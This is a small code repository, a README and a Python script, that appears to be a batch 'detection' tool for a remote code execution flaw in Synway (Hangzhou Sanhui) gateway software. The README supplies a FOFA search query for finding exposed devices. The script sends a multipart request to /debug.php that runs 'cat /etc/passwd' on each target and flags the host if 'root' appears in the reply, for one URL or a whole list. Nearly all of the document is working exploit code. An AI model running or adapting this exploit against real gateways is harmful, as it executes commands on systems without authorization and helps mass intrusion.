├── README.md └── debug.py /README.md: -------------------------------------------------------------------------------- 1 | # debug 2 | 杭州三汇网关远程代码执行批量检测脚本 3 | 4 | ![image](https://github.com/user-attachments/assets/60639ee1-24b6-40cb-ad79-6c3a1e9f0a71) 5 | 6 | ```shell 7 | 检测该漏洞所需要的FOFA语句: 8 | app="Synway-网关管理软件" 9 | 10 | 使用说明: 11 | -u 输入指定的URL单个检测 12 | -f 批量检测文本文件中的URL 13 | 注意: 14 | 使用的python解析器为python3 15 | 输入URL需要http/https协议 16 | ``` 17 | -------------------------------------------------------------------------------- /debug.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | 5 | def debug(url): 6 | create_url = url + "/debug.php" # 构造请求的URL地址 7 | 8 | data='''------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb 9 | Content-Disposition: form-data; name="comdtype" 10 | 11 | 1 12 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb 13 | Content-Disposition: form-data; name="cmd" 14 | 15 | cat /etc/passwd 16 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb 17 | Content-Disposition: form-data; name="run" 18 | 19 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--''' 20 | # 构造请求包中提交的数据,其中有命令执行的代码 21 | headers = { 22 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15", 23 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb" 24 | } 25 | # 构造请求数据与请求头中的部分内容 26 | 27 | try: 28 | req = requests.post(create_url, data=data, headers=headers, timeout=5) 29 | if (req.status_code == 200): 30 | # 上述构造的请求包中有/etc/passwd命令,看是否有root用户 31 | if "root" in req.text: 32 | print(f"{url}存在关于杭州三汇网关debug远程代码执行漏洞") 33 | #print(req.text) #显示该请求发送后响应包返回的内容 34 | else: 35 | print("该网址不存在相关漏洞") 36 | except: 37 | print("该网址无法访问或连接错误") 38 | 39 | 40 | def debug_counts(filename): 41 | try: 42 | with open(filename, "r") as file: 43 | readline = file.readlines() 44 | for urls in readline: 45 | urls = urls.strip() 46 | debug(urls) 47 | except: 48 | print("文件不存在或文件打开发生错误") 49 | 50 | 51 | def start(): 52 | logo = ''' 53 | ░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ 54 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 55 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ 56 | ░▒▓█▓▒░░▒▓█▓▒░▒▓██████▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ 57 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 58 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 59 | ░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░ 60 | 61 | 62 | ''' 63 | print(logo) 64 | print("wirten by YZX100") 65 | 66 | def main(): 67 | parser = argparse.ArgumentParser(description="杭州三汇网关debug远程代码执行") 68 | parser.add_argument('-u', type=str, help='检测单个url') 69 | parser.add_argument('-f', type=str, help='批量检测url列表文件') 70 | args = parser.parse_args() 71 | if args.u: 72 | debug(args.u) 73 | elif args.f: 74 | debug_counts(args.f) 75 | else: 76 | parser.print_help() 77 | 78 | 79 | if __name__ == "__main__": 80 | start() 81 | main() 82 | --------------------------------------------------------------------------------